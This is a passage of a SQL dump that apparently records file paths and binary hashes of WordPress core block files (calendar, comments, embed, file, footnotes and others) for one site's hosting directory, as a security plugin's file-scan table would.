OIRkD*','',0,'?'),('C!y6㋼','wp-includes/blocks/buttons/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/buttons/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}!r<','ն,*͖>3x\r6K5','',0,'?'),('K *;ܼnc','wp-includes/blocks/calendar/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O&o7;','qzDph8d`>w\\ o','',0,'?'),('9[E:Ѷq A','wp-includes/blocks/calendar/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/calendar/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\Z\"P{ў\"-',' `Gn$iC2{7$lIxW','',0,'?'),('%ucp֖]','wp-includes/blocks/calendar/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/calendar/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' WXAf~DaaZ','җ;mT}&]hNdEhT','',0,'?'),('Bs塘TL=','wp-includes/blocks/calendar/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/calendar/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\Z\"P{ў\"-',' `Gn$iC2{7$lIxW','',0,'?'),('3RCV','wp-includes/blocks/calendar/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/calendar/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' WXAf~DaaZ','җ;mT}&]hNdEhT','',0,'?'),('SzWNKUS','wp-includes/blocks/calendar.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qyIPE&','iGQӊg/ċ-\r5B\Z|5a','',0,'?'),('G#;\"L%','wp-includes/blocks/categories/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.Uy By%bO','3glnObV쵡R\"&zl','',0,'?'),('Z0s{\0GtZ','wp-includes/blocks/categories/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dWf4#ġEXt','*Z\rw{MM \'in','',0,'?'),(' kJ? @x','wp-includes/blocks/categories/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GG3-\Z#kv','kQ/\0v; ļ[Xv!!TS ','',0,'?'),(' t4${SE','wp-includes/blocks/categories/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xc@[R','ٸB%K\r{Mc~Y%u.?|','',0,'?'),('v&5jrjL #ܲ','wp-includes/blocks/categories/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\hpRZq',' @FH8 .IL\Z}#?\rZ','',0,'?'),('2sk','wp-includes/blocks/categories/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 8 MkR=\n','ؗ 0oTO|6W','',0,'?'),('hMVm  ','wp-includes/blocks/categories/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~B[|l',' \'Y9 9_ \0&  ','',0,'?'),('ġ!\Z','wp-includes/blocks/categories/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 8 MkR=\n','ؗ 0oTO|6W','',0,'?'),('&tQ\\j`qY','wp-includes/blocks/categories/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~B[|l',' \'Y9 9_ \0&  ','',0,'?'),('(ЊQB&Q?','wp-includes/blocks/categories.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v}_25','\rI<\rڃH\"6dB//Rq?','',0,'?'),('XsYqePL','wp-includes/blocks/code/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 Yw fw\\','S*bf*frNNGI?w+','',0,'?'),('=#-38','wp-includes/blocks/code/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+v{df$9^','K鏬/ sCS-\0U jhs 5 ','',0,'?'),('͑}P 07','wp-includes/blocks/code/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\JNPT-7]','ԈA','wp-includes/blocks/code/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!)>8o$',' %B*0Essx-\\s','',0,'?'),('$ tզ} T','wp-includes/blocks/code/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hhw>C','#0ckSvܾln lJ7','',0,'?'),('c ȵE9jz[','wp-includes/blocks/code/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!)>8o$',' %B*0Essx-\\s','',0,'?'),('`L\\3-i_3S\r','wp-includes/blocks/code/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hhw>C','#0ckSvܾln lJ7','',0,'?'),('Otþ|!a]','wp-includes/blocks/code/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\ZQ響',' $\r$gI`@+9\rmf','',0,'?'),('Jj\0pmw㚉b(','wp-includes/blocks/code/theme-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z mEJ','w($썎B.}e-','',0,'?'),('2_R[Y','wp-includes/blocks/code/theme.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\ZQ響',' $\r$gI`@+9\rmf','',0,'?'),('vhy2%()','wp-includes/blocks/code/theme.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/code/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z mEJ','w($썎B.}e-','',0,'?'),('*v','',0,'?'),('\\֯B!aV','wp-includes/blocks/comment-content/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-content/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hajWm={','\n\0k` ?prE_=E\\','',0,'?'),('Λ\\Lp','wp-includes/blocks/comment-content/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-content/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dASbkYhH',' \0]Q&A\nNmK@|p&kYN]','',0,'?'),('^ \"uZS ','wp-includes/blocks/comment-edit-link/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-edit-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Gel50Q','cжDw?:mz= 6٣;','wp-includes/blocks/comment-edit-link.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-edit-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';[ \Zz','O5%W/j(_\n4\ZtQq@n','',0,'?'),('䏂VܤcQ\'3','wp-includes/blocks/comment-reply-link/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-reply-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!TݖF. B','ˀ-e\'iZC[ KLWnAҮ6','',0,'?'),(')Q\n?Oar','wp-includes/blocks/comment-reply-link.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-reply-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{o>ipVz,','*EHr9`7fRMcʗiaVh','',0,'?'),('+\Z#(ƒv','wp-includes/blocks/comment-template/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VϮla 0ɎqC ','Mc}B{s1)HN','',0,'?'),('R\\p”','wp-includes/blocks/comment-template/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':=BW',' `gu F$`m=3c c%K','',0,'?'),('S!7Y*e4JS','wp-includes/blocks/comment-template/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L0Hs$8\"!','>GidV 5uv4','',0,'?'),('uV\'j\ZV','wp-includes/blocks/comment-template/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' T4\\Ƕw|?5 ds','50zsłK| ,]!^glH','',0,'?'),('\"6-L','wp-includes/blocks/comment-template/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 7RLy\0','L~|Gy^֝GC ǚ%mAu','',0,'?'),('a$:4j\0\ZX','wp-includes/blocks/comment-template.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f*Yβ.W','OzՕVLQ6?{aKq k','',0,'?'),('9f7lR>P','wp-includes/blocks/comments/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z~JK9Hv\'^','{Uiͷf$¯37Qk;]O','',0,'?'),('6Si\rلnT','wp-includes/blocks/comments/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W}I>וx','[JWv)@1qIO:Dx13?','',0,'?'),('6@V/\0','wp-includes/blocks/comments/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uO!l*O7',':%[*HWwfOCB7&X1','',0,'?'),('58L(9 |n\'','wp-includes/blocks/comments/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','޸2\'N{','=Ȟ=|k\nm<sq^Pifm','',0,'?'),(',h^【+_&','wp-includes/blocks/comments/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0Н#ѐ\nl','vwA*N`6.ai>\rZ \04h}X','',0,'?'),('e\n*v','wp-includes/blocks/comments/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g߿>\Z=(De','-0:\' !o6Ս\09ZN @7B Xv','',0,'?'),('~;$(pXz','wp-includes/blocks/comments/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qTaQ\n!','j›y^NtPvMpxt? .','',0,'?'),('-PF?:','wp-includes/blocks/comments/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e8_\Zꏐ','\nqC5!|v\0+iMԠKf\\{}','',0,'?'),('?kbx_JM','wp-includes/blocks/comments/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|X$ǂ=`',' `}nFW66ڮ4bSl\"~07','',0,'?'),(' h16\"S','wp-includes/blocks/comments-pagination/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ãe/o','1cڰ!+,vR~EL$p','',0,'?'),('jgXxrTsƤ','wp-includes/blocks/comments-pagination/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nPTV>0]GxK','\"GHH}*q\\\n-c|','',0,'?'),('SVf=1_Mwr>\"J\n','wp-includes/blocks/comments-pagination/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*n,Z~t<4A',' x{]\n_Yo\nws{-\"E#','',0,'?'),('ꮔ<,Z','wp-includes/blocks/comments-pagination/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','·Q2 y[S','rr)8J eZ\n*@`Cҙk=9-vB','',0,'?'),(' vg_\rz','wp-includes/blocks/comments-pagination/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e)FyD','*\"eF1 xjtG','',0,'?'),('>puL3Ij^bo','wp-includes/blocks/comments-pagination/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"I[/)+%կ[','rH$q!Tž*c\\M{\ZC؏fEߘ3L','',0,'?'),('%WRuw','wp-includes/blocks/comments-pagination/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\ZH\'Q','scEp9otHܛ{6sU','',0,'?'),('b#!A3XV4 ','wp-includes/blocks/comments-pagination/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','66ELСj-Ԉ(','`&`8sBVρCa ϐ!','',0,'?'),('D`aO\"Y%7Z','wp-includes/blocks/comments-pagination/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?*ɱ,','}M̋IENp54]pPÆw>kq!','',0,'?'),('L\"vṮL','wp-includes/blocks/comments-pagination-next/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-next/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hs:q)','MyuKw򃴎RZ(\Z5f','',0,'?'),('\'N8_\n\"h','wp-includes/blocks/comments-pagination-next.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-next.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','frt%KgyE\r{','.\Zͻs\"1[5rf\"wwW','',0,'?'),(')3C2b.','wp-includes/blocks/comments-pagination-numbers/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!','',0,'?'),('CFCT/ڮ+:`','wp-includes/blocks/comments-pagination-numbers/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r1Ah$RY','6=+B)/UASz','',0,'?'),('~\Z?OtY1','wp-includes/blocks/comments-pagination-numbers/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ңʟ;Vkn4','Lc߽4!BĢ:[Z\rQy','',0,'?'),('3Pdo,t','wp-includes/blocks/comments-pagination-numbers.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' +ڏ6<\'','%.xYavw\raihi[F','',0,'?'),('rnz\0`]e#+t','wp-includes/blocks/comments-pagination-previous/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-previous/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kIx7ź\04q3B^ܭ','',0,'?'),('ofGkL`t@','wp-includes/blocks/cover/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bmcHe','͔;KZW\rd➠6 \ncT839/{$','',0,'?'),('>Gf@Tម;D','wp-includes/blocks/cover/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W寵]4 |\n%','!q.a, ^.3zC\"“YtsFhgh7','',0,'?'),('\" 6A 7^H','wp-includes/blocks/cover/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߽v _i. ','BBGu\Z+%`<Q','',0,'?'),('}VI','wp-includes/blocks/cover.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|dDჍK+S','}cyB;D@4{c^','',0,'?'),('{Qw: *s','wp-includes/blocks/details/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EX\'\\l!L6u','`;3Z *vY:;*d','',0,'?'),('By$Cci8+g!','wp-includes/blocks/details/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z$Up= ','hD0DcErCQ6&0VLf|љ\r','',0,'?'),('(EhLf|~','wp-includes/blocks/details/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2GaF!P^','#_*%)&k;]V~z o','',0,'?'),('~\n\'$<','wp-includes/blocks/details/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z$Up= ','hD0DcErCQ6&0VLf|љ\r','',0,'?'),(' B~m9bnbŇ`=','wp-includes/blocks/details/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2GaF!P^','#_*%)&k;]V~z o','',0,'?'),('S9QeI3','wp-includes/blocks/details/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\"o@$)Nm','1j#IqNP\'9ˏEIJ_%','',0,'?'),('i4|?','wp-includes/blocks/details/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=P\'Ұbl9','b1Kvi/\"C','',0,'?'),('^zO5<','wp-includes/blocks/details/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\"o@$)Nm','1j#IqNP\'9ˏEIJ_%','',0,'?'),('G \n\Z s6\0QB','wp-includes/blocks/details/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=P\'Ұbl9','b1Kvi/\"C','',0,'?'),('!\')qM*Xc','wp-includes/blocks/embed/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|r[>_s','qti:z>$=GP%0`}N','',0,'?'),(' ɉ:s{1<','wp-includes/blocks/embed/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mT)hkԢ','Q_T!$jt5 9~#\0}','',0,'?'),('> I7m>꣍','wp-includes/blocks/embed/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KP2=R48%','PzDTgr','',0,'?'),('߹u7[)h','wp-includes/blocks/embed/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mT)hkԢ','Q_T!$jt5 9~#\0}','',0,'?'),('ņ ԡyiD1','wp-includes/blocks/embed/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KP2=R48%','PzDTgr','',0,'?'),('u \' M2 ','wp-includes/blocks/embed/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.LRәB>','9h*y=,OA\\\Z\0~_','',0,'?'),('ί?gW9','wp-includes/blocks/embed/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nQXhoW;E',' c\r YDZ\\iju+kU%','',0,'?'),('WnJ.\'/x','wp-includes/blocks/embed/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.LRәB>','9h*y=,OA\\\Z\0~_','',0,'?'),('sLYCa','wp-includes/blocks/embed/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nQXhoW;E',' c\r YDZ\\iju+kU%','',0,'?'),('rh^g=','wp-includes/blocks/embed/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','& ~XtJ\'`','b\"PP\0t,','wp-includes/blocks/file/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i=N\\i(',' t少V \r','',0,'?'),('VCdvۦ','wp-includes/blocks/file/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ōL?*','Ts3n\nAtl۩_S^HZ#8','',0,'?'),('֬+I7 ^','wp-includes/blocks/file/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\Z#8ъ','d3uQuHB i!ve〈(','',0,'?'),('[BX\nQc','wp-includes/blocks/file/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6HZCw+{jR','*m~2}vD3*}.ɉ%3ЮQ','',0,'?'),('k0k⟆VX','wp-includes/blocks/file/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ry[#z͢\n=','G L~Aua:aUa,/w)','',0,'?'),('} aX]D*I','wp-includes/blocks/file/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n8.g\0BP','TNNٌ','wp-includes/blocks/file/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LN\"biqדF','wbpmE_N|>Pd[!`(a','',0,'?'),('Ȩr%Mè','wp-includes/blocks/file/view.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/view.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~vED','wka?/iZgA K9M','',0,'?'),('cᘣrw','wp-includes/blocks/file/view.js','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\"dȤ2','3lEb,]V\\ﶇwԄJ^ӶY','',0,'?'),('\rܹ͛}CLR)','wp-includes/blocks/file/view.min.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/view.min.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','goyAOwТȟ','jd/nf\'}vÉE','',0,'?'),('\0뀄 ;t/-','wp-includes/blocks/file/view.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' mg0B!(g\nG',')\0zZ6ReκjrZxȘ','',0,'?'),('sX3f$','wp-includes/blocks/file.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZIhͥF\0Bmb','i]Q=dՏKj=u`f','',0,'?'),('эڬxV&TZxjw','wp-includes/blocks/footnotes/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cЛpCEQ_1E]','jK7Oi|ruC^FhX Tt','',0,'?'),('x++\r‘P','wp-includes/blocks/footnotes/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f`)_','D邴]=呔2Uh{HE8A_','',0,'?'),('PIUxfJ%q','wp-includes/blocks/footnotes/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڌ\ZZSI-','PINΙZtr\'ׂ=,]-','',0,'?'),('YКqK.3hҦ','wp-includes/blocks/footnotes/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','# q7@vޑ','i `\"TB]-Ywf],q','',0,'?'),('\r՟)z','wp-includes/blocks/footnotes/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0bk.3Ի۴','S (:`+ %ǴXfE','',0,'?'),('rwƞ','wp-includes/blocks/footnotes.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gVīq','^gg+0aLxN»L3`T','',0,'?'),('+M%]sD00','wp-includes/blocks/freeform/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!dNiklB','mzh+ýLƜl h/Ą\\=','',0,'?'),('gKN>J4','wp-includes/blocks/freeform/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'X+K 